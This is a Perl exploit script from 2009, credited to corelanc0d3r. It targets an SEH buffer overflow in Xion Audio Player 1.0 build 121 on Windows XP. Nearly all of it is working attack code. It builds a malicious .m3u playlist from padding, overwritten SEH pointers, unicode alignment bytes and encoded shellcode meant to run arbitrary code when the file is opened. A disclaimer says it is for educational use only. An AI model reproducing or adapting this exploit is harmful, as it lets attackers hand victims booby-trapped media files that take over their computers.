# [*] Vulnerability : Xion Audio Player Local BOF # [*] Discovered by : Dragon Rider (http://securityreason.com/exploitalert/7392) # [*] drag0n.rider(at)hotmail.com # [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com) # [*] Sploit released : nov 3rd, 2009 # [*] Type : local and remote code execution # [*] OS : Windows # [*] Product : Xion Audio Player # [*] Versions affected : 1.0 build 121 # [*] Download from : http://www.brothersoft.com/xion-audio-player-download-49404.html # [*] ------------------------------------------------------------------------- # [*] Method : SEH # [*] Tested on : XP SP3 En # [*] Greetz&Tx to : DellNull/EdiStrosar/F/P/W # [*] ------------------------------------------------------------------------- # MMMMM~. # MMMMM?. # MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM. # MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM: # MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM: # MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM: # MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM: # MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM: # =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM: # .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM: # .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,. # eip hunters # ----------------------------------------------------------------------------- # Script provided 'as is', without any warranty. # Use for educational purposes only. # my $sploitfile="corelansploit.m3u"; my $junk = "\x41" x 254; my $nseh="\x58\x48"; my $seh="\xf5\x48"; my $align="\x55"; $align=$align."\x6d"; $align=$align."\x58"; $align=$align."\x6d"; $align = $align."\x05\x10\x11"; $align=$align."\x6d"; $align=$align."\x2d\x02\x11"; $align=$align."\x6d"; my $jump = "\x50"; $jump=$jump."\x6d"; $jump=$jump."\xc3"; my $padding="A" x 73; my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK8Q4KPKPKP4KQ5OLTKSLLERXM1JOTK0OLXDK1OO0M1JKPITK044KKQJN01WPTYVLE4Y0BTKW91WZLMKQ7RJKZTOKB4NDLDCE9UDKQOMTKQJKRFDKLLPKTKQOMLKQJKTKMLDKKQZKSYQLO4M4WSNQGPBDTKOPNPSUY0D8LLTKOPLLTKRPML6MTK2HKXZKM94K3PVPKPKPKPDK1XOL1ONQJVC0PVTIL853WP3K0PBHZPTJKTQO2HV8KNSZLNPWKOYWQSQQRLQSKPA"; my $filler = ("\xcc" x (17990-length($shellcode))); my $payload = $junk.$nseh.$seh.$align.$jump.$padding.$shellcode.$filler; open(myfile,">$sploitfile"); print myfile $payload; print "Wrote " . length($payload)." bytes to $sploitfile\n"; close(myfile);